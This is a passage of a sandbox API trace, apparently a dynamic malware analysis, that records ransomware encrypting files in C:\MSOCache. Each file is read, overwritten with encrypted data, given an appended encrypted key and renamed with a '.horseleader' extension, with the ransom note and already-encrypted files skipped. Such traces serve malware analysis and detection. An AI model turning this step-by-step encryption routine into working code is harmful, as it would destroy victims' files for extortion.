lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0210.106] CloseHandle (hObject=0x21c) returned 1 [0210.106] GetProcessHeap () returned 0x780000 [0210.106] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0210.106] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.horseleader") returned 91 [0210.106] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.horseleader")) returned 1 [0210.107] GetProcessHeap () returned 0x780000 [0210.107] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0210.107] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85142d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xccb88, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0210.107] lstrcmpiW (lpString1="DW20.EXE", lpString2="Windows") returned -1 [0210.107] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0210.107] StrStrIW (lpFirst="DW20.EXE", lpSrch=".horseleader") returned 0x0 [0210.107] lstrcmpW (lpString1="DW20.EXE", lpString2="#Decrypt#.txt") returned 1 [0210.107] lstrcmpW (lpString1="DW20.EXE", lpString2="_uninstalling_.png") returned 1 [0210.107] lstrlenW (lpString=".testttjffg") returned 11 [0210.107] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE", lpSrch=".testttjffg") returned 0x0 [0210.107] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0210.107] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0210.107] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0210.108] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0210.108] StrStrW (lpFirst="DW20.EXE", lpSrch=".txt") returned 0x0 [0210.108] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=838536) returned 1 [0210.108] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.108] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.156] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0210.156] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.157] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x63dc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.157] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.217] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0210.217] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.217] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xc7b88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.217] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.229] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0210.229] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.229] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.229] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0210.229] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0210.230] CloseHandle (hObject=0x21c) returned 1 [0210.230] GetProcessHeap () returned 0x780000 [0210.230] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0210.230] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.horseleader") returned 87 [0210.230] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.horseleader")) returned 1 [0210.231] GetProcessHeap () returned 0x780000 [0210.231] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0210.231] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85ab8b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x80760, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="dwdcw20.dll", cAlternateFileName="")) returned 1 [0210.231] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="Windows") returned -1 [0210.231] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0210.231] StrStrIW (lpFirst="dwdcw20.dll", lpSrch=".horseleader") returned 0x0 [0210.231] lstrcmpW (lpString1="dwdcw20.dll", lpString2="#Decrypt#.txt") returned 1 [0210.231] lstrcmpW (lpString1="dwdcw20.dll", lpString2="_uninstalling_.png") returned 1 [0210.231] lstrlenW (lpString=".testttjffg") returned 11 [0210.231] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll", lpSrch=".testttjffg") returned 0x0 [0210.231] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0210.231] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0210.232] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0210.232] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0210.232] StrStrW (lpFirst="dwdcw20.dll", lpSrch=".txt") returned 0x0 [0210.232] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=526176) returned 1 [0210.232] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.232] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.832] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0210.832] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.832] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3dbb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.832] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.628] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.628] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.629] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x7b760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.629] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.631] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.631] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.631] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.632] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.632] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.632] CloseHandle (hObject=0x21c) returned 1 [0211.632] GetProcessHeap () returned 0x780000 [0211.632] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.632] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.horseleader") returned 90 [0211.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.horseleader")) returned 1 [0211.633] GetProcessHeap () returned 0x780000 [0211.633] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.633] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85f73a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7eda0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="dwtrig20.exe", cAlternateFileName="")) returned 1 [0211.633] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="Windows") returned -1 [0211.633] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0211.634] StrStrIW (lpFirst="dwtrig20.exe", lpSrch=".horseleader") returned 0x0 [0211.634] lstrcmpW (lpString1="dwtrig20.exe", lpString2="#Decrypt#.txt") returned 1 [0211.634] lstrcmpW (lpString1="dwtrig20.exe", lpString2="_uninstalling_.png") returned 1 [0211.634] lstrlenW (lpString=".testttjffg") returned 11 [0211.634] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe", lpSrch=".testttjffg") returned 0x0 [0211.634] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.634] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.634] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.634] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0211.634] StrStrW (lpFirst="dwtrig20.exe", lpSrch=".txt") returned 0x0 [0211.635] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=519584) returned 1 [0211.635] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.635] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.641] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.642] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.642] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3ced0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.642] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.654] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.654] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.655] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x79da0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.655] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.670] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.670] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.670] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.670] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.671] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.671] CloseHandle (hObject=0x21c) returned 1 [0211.671] GetProcessHeap () returned 0x780000 [0211.671] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.671] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.horseleader") returned 91 [0211.672] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.horseleader")) returned 1 [0211.672] GetProcessHeap () returned 0x780000 [0211.672] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.672] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Microsoft.VC90.CRT.manifest", cAlternateFileName="MICROS~1.MAN")) returned 1 [0211.672] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="Windows") returned -1 [0211.673] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0211.673] StrStrIW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".horseleader") returned 0x0 [0211.673] lstrcmpW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="#Decrypt#.txt") returned 1 [0211.673] lstrcmpW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="_uninstalling_.png") returned 1 [0211.673] lstrlenW (lpString=".testttjffg") returned 11 [0211.673] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpSrch=".testttjffg") returned 0x0 [0211.673] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.673] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.673] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.674] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0211.674] StrStrW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".txt") returned 0x0 [0211.674] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1857) returned 1 [0211.674] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x741, lpOverlapped=0x0) returned 1 [0211.700] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff8bf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.700] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x741, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x741, lpOverlapped=0x0) returned 1 [0211.700] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.700] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.701] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.701] CloseHandle (hObject=0x21c) returned 1 [0211.701] GetProcessHeap () returned 0x780000 [0211.701] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.701] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.horseleader") returned 106 [0211.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.horseleader")) returned 1 